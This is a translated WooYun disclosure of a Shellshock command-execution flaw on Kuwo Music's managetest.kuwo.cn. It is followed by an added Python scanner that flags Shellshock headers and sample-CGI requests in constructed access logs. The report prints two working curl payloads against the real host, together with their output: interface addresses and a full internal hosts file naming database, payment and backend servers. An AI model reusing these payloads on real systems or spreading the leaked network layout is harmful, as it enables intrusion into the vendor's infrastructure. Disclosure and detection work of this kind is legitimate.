
Vulnerability summary (24 followers)

Defect ID: wooyun-2016-0171346

Title: Command execution on a Kuwo Music site

Vendor: Kuwo Music (酷我音乐)

Author: 路人甲

Submitted: 2016-01-20 14:21

Fixed: 2016-01-25 14:30

Published: 2016-01-25 14:30

Vulnerability type: improper system/service operations configuration

Severity: High

Self-assessed Rank: 10

Status: the vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2016-01-20: details sent to the vendor, awaiting vendor handling
2016-01-25: vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Command execution on a Kuwo site

Detailed description:

managetest.kuwo.cn has a bash command execution vulnerability
curl -A "() { foo;};echo;/sbin/ifconfig" http://managetest.kuwo.cn/cgi-bin/test-cgi
eth0 Link encap:Ethernet HWaddr 00:1A:A0:0D:FB:38
inet addr:60.28.205.41 Bcast:60.28.205.63 Mask:255.255.255.224
inet6 addr: fe80::21a:a0ff:fe0d:fb38/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1150352590 errors:0 dropped:0 overruns:0 frame:0
TX packets:2511972745 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:228359309665 (212.6 GiB) TX bytes:972996034118 (906.1 GiB)
Interrupt:169 Memory:f4000000-f4011100
eth0:1 Link encap:Ethernet HWaddr 00:1A:A0:0D:FB:38
inet addr:60.28.205.48 Bcast:60.28.205.63 Mask:255.255.255.224
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:169 Memory:f4000000-f4011100
eth1 Link encap:Ethernet HWaddr 00:1A:A0:0D:FB:36
inet addr:192.168.0.42 Bcast:192.168.255.255 Mask:255.255.0.0
inet6 addr: fe80::21a:a0ff:fe0d:fb36/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:7819254624 errors:0 dropped:0 overruns:0 frame:0
TX packets:11484217788 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:3514910215382 (3.1 TiB) TX bytes:14712204358111 (13.3 TiB)
Interrupt:169 Memory:f8000000-f8011100
eth1:0 Link encap:Ethernet HWaddr 00:1A:A0:0D:FB:36
inet addr:192.168.0.136 Bcast:192.168.255.255 Mask:255.255.0.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:169 Memory:f8000000-f8011100
eth1:1 Link encap:Ethernet HWaddr 00:1A:A0:0D:FB:36
inet addr:192.168.0.139 Bcast:192.168.255.255 Mask:255.255.0.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:169 Memory:f8000000-f8011100
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:111515227 errors:0 dropped:0 overruns:0 frame:0
TX packets:111515227 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:66706130576 (62.1 GiB) TX bytes:66706130576 (62.1 GiB)
lo:0 Link encap:Local Loopback
inet addr:60.28.205.61 Mask:255.255.255.255
UP LOOPBACK RUNNING MTU:16436 Metric:1
lo:1 Link encap:Local Loopback
inet addr:60.28.193.246 Mask:255.255.255.255
UP LOOPBACK RUNNING MTU:16436 Metric:1
lo:2 Link encap:Local Loopback
inet addr:127.0.0.2 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1

Proof of vulnerability:

curl -A "() { foo;};echo;/bin/cat /etc/hosts" http://managetest.kuwo.cn/cgi-bin/test-cgi
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1 backup42.com backup42 localhost
127.0.0.1 image.kuwo.cn
#127.0.0.1 star.kuwo.cn
192.168.1.120 s120
192.168.0.80 lyric80
192.168.0.82 lyric82
192.168.0.81 lyric81
192.168.0.88 lyric88
192.168.0.96 lyric96
192.168.0.97 lyric97
60.29.226.181 www.kuwo.cn
60.29.226.181 kzone.kuwo.cn
192.168.0.248 bkserver248
192.168.0.187 bkserver187
192.168.0.179 bkserver179
192.168.0.169 bkserver169
192.168.0.170 bkserver170
192.168.210.240 bkserver240
192.168.0.190 bkserver190
192.168.0.43 bkserver43
192.168.0.174 bkserver174
192.168.0.39 bkserver39
192.168.0.40 bkserver40
192.168.217.183 bkserver183
192.168.0.189 bkserver189
192.168.0.26 bkserver26
#192.168.210.85 bkserver85
192.168.210.71 bkserver85
192.168.0.56 bkserver56
60.28.199.29 bkserver29
60.28.210.125 bkserver125
#60.28.205.61 nplserver.kuwo.cn
#60.28.205.41 fang1.koowo.com
#60.28.205.41 fang2.koowo.com
#60.28.205.41 fang.koowo.com
127.0.0.1 test41.kuwo.cn
127.0.0.1 ksingservice.kuwo.cn
#127.0.0.1 star.kuwo.cn
#127.0.0.1 mv.koowo.com
#60.28.205.48 fang1.koowo.com
#60.28.205.48 fang2.koowo.com
#60.28.205.48 fang.koowo.com
127.0.0.1 fang1.koowo.com
127.0.0.1 fang2.koowo.com
127.0.0.1 fang.koowo.com
#60.28.205.41 www.kuwo.cn
#221.238.18.39 kzone.kuwo.cn
#60.29.225.24 kzone.kuwo.cn
60.28.205.48 kzone48.koowo.com
60.28.205.48 kzone48.kuwo.cn
#60.28.205.48 star.koowo.com
#the following settings are for koowo web develop
127.0.0.1 mainwebserver
192.168.0.174 mainwebserver_T
#web servers
192.168.0.42 localwebserver
192.168.0.57 otherwebserver1
192.168.0.188 otherwebserver2
192.168.0.184 otherwebserver3
192.168.217.171 otherwebserver4
192.168.0.74 otherwebserver5
192.168.201.12 otherwebserver6
192.168.217.185 otherwebserver7
192.168.217.168 ucmwebserver1
192.168.217.173 ucmwebserver2
#backend servers
192.168.0.169 lhserver
192.168.0.169 scoreserver
192.168.0.169 loginserver
192.168.0.169 guestserver
192.168.0.169 musicstatserver
192.168.0.49 lhbakserver
60.28.205.41 profilecacheserver
192.168.0.21 profileoscacheserver
192.168.0.21 usercacheserver
192.168.0.187 newsserver
192.168.0.187 activityserver
192.168.206.247 reslist.kuwo.cn
192.168.0.80 shouji.kuwo.cn
#databases
192.168.0.185 queryservereditor
192.168.0.185 queryserver185
192.168.201.44 queryserver44
192.168.0.185 queryservermlog
192.168.0.186 queryserver186
#192.168.0.42 queryserver186
192.168.0.42 queryserver41
192.168.0.188 queryserver188
192.168.0.185 queryserver46
192.168.0.177 queryserver177
192.168.210.76 vipuserdatabaseserver
192.168.0.169 queryserver43
192.168.201.43 queryserver20143
192.168.0.189 queryserver189
#192.168.217.171 queryserver171
#192.168.210.104 queryserver171
192.168.226.167 queryserver171
60.29.226.168 queryserver190
192.168.217.171 queryserver74
192.168.201.16 queryserver16
192.168.201.17 queryserver17
192.168.10.50 queryserver50
192.168.10.51 queryserver51
192.168.210.125 queryserver87
#221.238.18.45 huangfan.kuwo.cn
60.28.204.156 huangfan.kuwo.cn
60.28.205.38 koowo.com
60.28.205.38 kuwo.cn
60.217.32.231 mail.koowo.cn
60.217.32.233 mail.kuwomail.com
192.168.199.24 queryserver29
192.168.0.42 local.kuwo.cn
#60.29.226.174 search.kuwo.cn
#192.168.0.53 search.kuwo.cn
#192.168.0.53 search.koowo.com
192.168.0.54 search.koowo.com
192.168.210.106 search.kuwo.cn
60.28.205.41 player.kuwo.cn
127.0.0.1 dh.kuwo.cn
60.28.205.57 css.kuwo.cn
#60.28.205.56 tips.kuwo.cn
60.28.205.39 data.search.kuwo.cn
#60.28.205.39 search.kuwo.cn
#192.168.0.53 search.koowo.com
#192.168.0.53 search.kuwo.cn
#60.29.226.174 search.kuwo.cn
#60.29.226.174 search.koowo.com
#192.168.0.146 nplserver.kuwo.cn
60.28.205.39 lyric.koowo.com
60.28.205.39 lyric.kuwo.cn
60.28.205.39 newlyric.koowo.com
60.28.205.39 newlyric.kuwo.cn
60.28.199.29 topmusic.kuwo.cn
60.28.199.24 queryserver24
218.27.132.18 mp3dl.cdn.kuwo.cn
#test env for dj backend
#60.28.193.252 gyhserver1.kuwo.cn
#kuwolive
#60.28.201.38 antiserver.kuwo.cn
#192.168.0.181 antiserver.kuwo.cn
#192.168.0.170 antiserver.kuwo.cn
#192.168.206.247 antiserver.kuwo.cn
192.168.195.120 antiserver.kuwo.cn
192.168.217.188 nksingserver.kuwo.cn
#game history
192.168.217.174 gamehistoryserver.kuwo.cn
#60.29.244.181 user.hvsop.cn
60.28.201.5 puppet.kuwo.cn
192.168.201.38 updateedit.kuwo.cn
# for zadan test
127.0.0.1 topic.kuwo.cn
127.0.0.1 pc.kuwo.cn
60.28.210.68 mobi.kuwo.cn
192.168.210.76 pay-master.db.kuwo.cn
192.168.226.167 pay-slave.db.kuwo.cn
192.168.201.30 pay-backup.db.kuwo.cn
192.168.210.76 vip-master.db.kuwo.cn
192.168.226.167 vip-slave.db.kuwo.cn
192.168.201.30 vip-backup.db.kuwo.cn
192.168.201.43 vip-test.db.kuwo.cn
192.168.210.74 queryserverdd
#60.28.210.114 zhiboserver.kuwo.cn
#60.28.201.37 x.kuwo.cn
Content-type: text/plain; charset=iso-8859-1

Remediation:

If nothing else, delete test-cgi

Copyright notice: when reproducing, credit the source 路人甲@乌云
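The `() { ...};` User-Agent used in the proof above is the bash function-import pattern known as Shellshock: a CGI server exports request headers into the environment, and an unpatched bash executes whatever follows the function body. Removing the sample script test-cgi, as the remediation says, closes this endpoint; the defender also wants to know whether such probes were made. The following scanner is an added example, not code from the report or from Kuwo: it parses combined-format access log lines, flags header values carrying the function-definition marker and requests for Apache's sample CGI scripts, and runs on constructed log lines (documentation IP ranges, with the report's own payload strings) rather than on real data. The list of sample script names is an assumption for illustration.

```python
"""Scan access logs for Shellshock-style headers and requests to sample CGI scripts.

Added example; the hosts, IPs and log lines below are constructed, not from the report.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Apache/nginx "combined" log format:
#   client ident user [time] "request" status size "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Unpatched bash imported any environment variable whose value starts with "() {"
# as a function definition and then executed whatever followed the closing brace.
# CGI servers export request headers (User-Agent, Referer, ...) as environment
# variables, which is how a crafted header reaches bash. This marker matches the
# literal form used in the report; it does not try to cover encoded variants.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

# Sample scripts shipped in the Apache httpd distribution's cgi-bin directory.
# Assumption: illustrative list, not exhaustive.
SAMPLE_CGI_SCRIPTS = {"test-cgi", "printenv"}


@dataclass
class Finding:
    client: str
    time: str
    path: str
    reasons: List[str] = field(default_factory=list)


def analyze_line(line: str) -> Optional[Finding]:
    """Return a Finding if the line looks like a Shellshock probe or a request
    for a sample CGI script; otherwise None."""
    m = COMBINED_RE.match(line.rstrip("\n"))
    if not m:
        return None  # not combined format: skip rather than guess
    request_parts = m.group("request").split()
    path = request_parts[1] if len(request_parts) >= 2 else m.group("request")
    path_only = path.split("?", 1)[0]

    reasons: List[str] = []
    for header_name in ("ua", "referer"):
        if SHELLSHOCK_RE.search(m.group(header_name)):
            reasons.append(f"bash function definition in {header_name}")
    script = path_only.rsplit("/", 1)[-1]
    if path_only.startswith("/cgi-bin/") and script in SAMPLE_CGI_SCRIPTS:
        reasons.append("request for sample CGI script")
    if not reasons:
        return None
    return Finding(m.group("client"), m.group("time"), path_only, reasons)


def scan_log(lines) -> List[Finding]:
    """Apply analyze_line to every line and keep the hits, in log order."""
    return [f for f in (analyze_line(l) for l in lines) if f is not None]


# Constructed sample log using RFC 5737 documentation addresses; the header
# payloads are the two strings shown in the report, one of them moved to Referer.
SAMPLE_LOG = [
    '203.0.113.7 - - [20/Jan/2016:14:20:01 +0800] "GET /cgi-bin/test-cgi HTTP/1.1" '
    '200 512 "-" "() { foo;};echo;/sbin/ifconfig"',
    '203.0.113.7 - - [20/Jan/2016:14:20:05 +0800] "GET /cgi-bin/test-cgi HTTP/1.1" '
    '200 4096 "-" "() { foo;};echo;/bin/cat /etc/hosts"',
    '198.51.100.3 - - [20/Jan/2016:14:21:00 +0800] "GET /index.html HTTP/1.1" '
    '200 1024 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [20/Jan/2016:14:22:00 +0800] "GET /cgi-bin/app.cgi HTTP/1.1" '
    '200 100 "() { foo;};echo;/bin/cat /etc/hosts" "curl/7.40.0"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.time} {f.client} {f.path}: {', '.join(f.reasons)}")
```

Requests for test-cgi are flagged even without a payload, because on a production host the script's mere presence is the finding the remediation line is about; the header check is kept separate so a scanner can report the two conditions independently.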


Vulnerability response

Vendor response:

Severity: no impact, vendor ignored

Ignored at: 2016-01-25 14:30

Vendor reply:

Vulnerability Rank: 15 (WooYun assessment)

Latest status:

None yet


Vulnerability comments:

Comments

  1. 2016-01-20 14:36 | 大师兄 ( Passerby | Rank:29 Vulnerabilities:7 | Checks WooYun every day)

    mark

  2. 2016-01-20 16:59 | 牛 小 帅 ( Regular white hat | Rank:946 Vulnerabilities:220 | 1. The most handsome man on WooYun ...)

    @大师兄 your rank went up, ha

  3. 2016-01-21 08:09 | 大师兄 ( Passerby | Rank:29 Vulnerabilities:7 | Checks WooYun every day)

    @牛 小 帅 - - ! Can't keep up with you...